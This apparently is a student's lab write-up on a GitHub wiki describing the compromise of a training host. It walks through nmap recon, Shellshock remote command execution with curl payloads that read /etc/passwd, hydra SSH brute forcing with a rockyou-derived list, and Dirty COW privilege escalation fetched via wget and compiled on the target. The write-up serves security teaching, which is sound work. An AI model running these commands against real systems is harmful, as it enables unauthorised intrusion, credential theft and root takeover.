Activity 4.1 - Zacham17/my-tech-journal GitHub Wiki
Activity 4.1: Exploiting Cupcake
This page will cover activity 4.1 and also act as notes for subjects such as using nmaptocsv, remote code execution, and running privilege escalation exploits.
Active Recon
- I ran an nmap scan on the target, cupcake.shire.org, at 10.0.5.23 for ports 1-6000 to find running services.
- The command I used is
sudo nmap -A -sV -O -p 1-6000 10.0.5.23
- The command I used is
- The scan revealed the open ports and services running, which were OpenSSH 5.3 on port 22, and Apache httpd 2.2.15.
- I also found that Linux 2.6.32 is running on the machine.
- With an online search, I was able to determine that the CentOS version running is version 6.X. It is difficult to determine the exact release.
- The source I used can be found here
- I also navigated to the httpd apache server on a web browser to access the cgi-bin/status file.
Using nmaptocsv
- I installed
nmaptocsvusing the commandssudo apt update,sudo apt install python3-pip, andsudo pip install nmaptocsvin that order. - I then ran the command
sudo nmap -sT -sV -p 1-1000 10.0.5.23 -Pn -oG top1000.txtto scan ports 1-1000 on 10.0.5.23 and output the results into top1000.txt in a greppable format - I then used the command
nmaptocsv -i top1000.txt -d ","to output the contents of top1000.txt in a csv format, which I was able to copy into a spreadsheet
Vulnerability Detection
Using information gathered about the target host's operating system and web service, I searched online for exploits and vulnerabilities that could be used. I found that there are various exploits on Apache version 2.2.15, some of which involve remote command execution or authentication bypass. One exploit is called Shellshock, and it is a remote code execution exploit.
My sources are below:
Remote Code Execution
Nmap
- One command that I used to remotely execute commands is nmap. I used this command:
sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -s -r -v" 10.0.5.23- That command uses nmap arguments to remotely execute the
unamecommand to retrieve the running kernel version.
- That command uses nmap arguments to remotely execute the
Curl
- One command that I used to remotely execute commands is curl.
- I used the command
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status- That command execute a chosen command, by exploiting the webserver. The command uses the
catcommand to output the contents of the /etc/passwd file
- That command execute a chosen command, by exploiting the webserver. The command uses the
- I also used this command:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat status' bash -s :'' http://10.0.5.23/cgi-bin/status- The command uses curl to navigate the files of 10.0.5.23 to execute a chosen command, by exploiting the webserver. The command uses the
catcommand to output the code behind the status cgi
- The command uses curl to navigate the files of 10.0.5.23 to execute a chosen command, by exploiting the webserver. The command uses the
- A third command that I used is
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s :'' http://10.0.5.23/cgi-bin/status- That command uses curl to execute a chosen command remotely, by exploiting the webserver. The command uses the
ifconfigcommand to output the network information of the exploited host.
- That command uses curl to execute a chosen command remotely, by exploiting the webserver. The command uses the
Making a Password List
- I used the /usr/share/wordlists/rockyou.txt.gz file to help create a list of potential passwords for the samwise user.
- I first extracted the rockyou.txt.gz file using
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz - I then used the command
cat /usr/share/wordlists/rockyou.txt | grep -i "samwise" > passwordlist.txtto gather a list of possible passwords for the samwise user.
Brute Force Password Cracking
- I used the command
hydra -l samwise -P passwordlist.txt 10.0.5.23 -t 4 sshto determine the password for the samwise user, using passwordlist.txt - Before testing out the ssh, I had to create and edit the ~/.ssh/config file by adding the lines:
HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedAlgorithms +ssh-rsa
-
This allowed me to ssh to 10.0.5.23
-
I was then able to ssh into 10.0.5.23 using the samwise user and the password.
Root Compromise
Using Searchsploit
- I searched for known exploits on the Linux Kernel version of the target host using the command
searchsploit Linux Kernel 2.6. The command provided a list of known exploits for the linux kernel version. - I decided to use exploit 40839, which is a "dirty COW", race condition privilege escalation exploit. The exploit creates a user with root priviledges.
- I used the command,
searchsploit -m 40839to download the exploit code
Performing the Exploit
- I invoked a webserver on my kali VM on port 8017 using
python3 -m http.serer 8017 - I used ssh to access the target host using the samwise user. I then used the command,
wget http://10.0.99.53:8017/40839.cto retrieve the exploit from my Kali VM. - On the target host, I used the command,
gcc 40839.c -o dirtycow -lpthread -lcryptto create a program that runs the exploit. - I executed the program by typing
./dirtycow. I then entered a password as requested and let the program run. The program replaces the /etc/passwd file to add a root user with the provided password. - After the program succeeded, a new user had been created called "firefart" which was given the password I provided. The "firefart" user also has root access/permissions.
- Lastly, I made sure to revert any changes that were made in the exploit process in order for the system to be in an exploitable state for the next user to attempt an exploit.
Reflection:
This activity was a good introduction to taking advantage of exploits on certain systems and how to find the exploits in the first place. I learned about using nmaptocsv to create spreadsheets with important scan information. I also learned about using commands such as nmap and curl to perform remote code execution. It is also useful to know about the rockyou.txt.gz file, and how to parse it for passwords to turn into a list. Something else new to me in this activity was the use of hydra to brute force password cracking as well as using searchsploit to find exploits for specific kernel versions for a system. Lastly, I enjoyed getting experience with implementing an exploit on a system to escalate privileges on that system. It really solidifies the fact that security measures need to be taken to prevent such exploits. I didn’t have much trouble in this activity, but I feel like I learned a lot.